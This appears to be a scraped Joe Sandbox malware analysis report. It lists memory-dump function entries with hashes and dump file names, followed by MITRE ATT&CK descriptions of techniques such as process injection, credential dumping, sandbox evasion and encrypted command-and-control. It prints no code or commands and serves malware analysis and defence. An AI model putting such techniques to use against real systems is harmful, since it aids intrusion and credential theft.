Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0996c433894fc7afab24d6d85c483140e0c314fbf0e6d0c6a9ae7c5cff9e24b
Instruction ID: 96aed752fa8c79da1b4f0f69ba8e2a154df529069c71be93bf199f19f2e2a451
Opcode Fuzzy Hash: e0996c433894fc7afab24d6d85c483140e0c314fbf0e6d0c6a9ae7c5cff9e24b
Instruction Fuzzy Hash: 91F090654087838EDB05CE2A8060771FBA5AF63705F1D11DDD9C1AB393DB1AD88AD724

Function 0095E0DA Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
Instruction ID: 64fd875e3fa9f8c2b80ecc7ea77c304c5d14f5249222ea3c92c48365e3012ae5
Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
Instruction Fuzzy Hash: E6F0651040C7E28ADB278B3F44606B3AFE09B63121F181BD5CCF19B2C7C315959AC366

Function 0095D116 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e10a9e31d3056f3c2bce0152bcc5df106f3ef0fc51a205dfef0ac42f44a29fc
Instruction ID: ac4a5072c7fc18b51b3a4dee05a1753d7ff3147d349d88383a52279e66f3c00c
Opcode Fuzzy Hash: 2e10a9e31d3056f3c2bce0152bcc5df106f3ef0fc51a205dfef0ac42f44a29fc
Instruction Fuzzy Hash: 8101F4716442829BD314CF38CCA4677FBA1EB86364F08CB9CD45A8B796C638D882C795

Function 0093C805 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d9c9cef1e8d3b4a4fd0d7f16c6d9c761792eaea60e480604b6697cc427961f5
Instruction ID: d209fb4a52d63ee00a9fca0b3e0be6c4aa20696bd4edd98b95aff96f7022f07e
Opcode Fuzzy Hash: 9d9c9cef1e8d3b4a4fd0d7f16c6d9c761792eaea60e480604b6697cc427961f5
Instruction Fuzzy Hash: 1AC0123652A441DF82444F20DC0847DB374BB4B102B406404D51FD3222CB21A541AA9D

Function 009537D6 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f445bad160d796a8494f2d145f7e02b9e38c43df124d8c783cda05a114fa9b87
Instruction ID: afb5f057daf4e087933a2df1975f60cb05dc4866f851060e713adbcbd387ea23
Opcode Fuzzy Hash: f445bad160d796a8494f2d145f7e02b9e38c43df124d8c783cda05a114fa9b87
Instruction Fuzzy Hash: FCB092B0E1C2018A8308DF00E140039AAB4628F242F30A41DD04A63211C220C148AA88

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
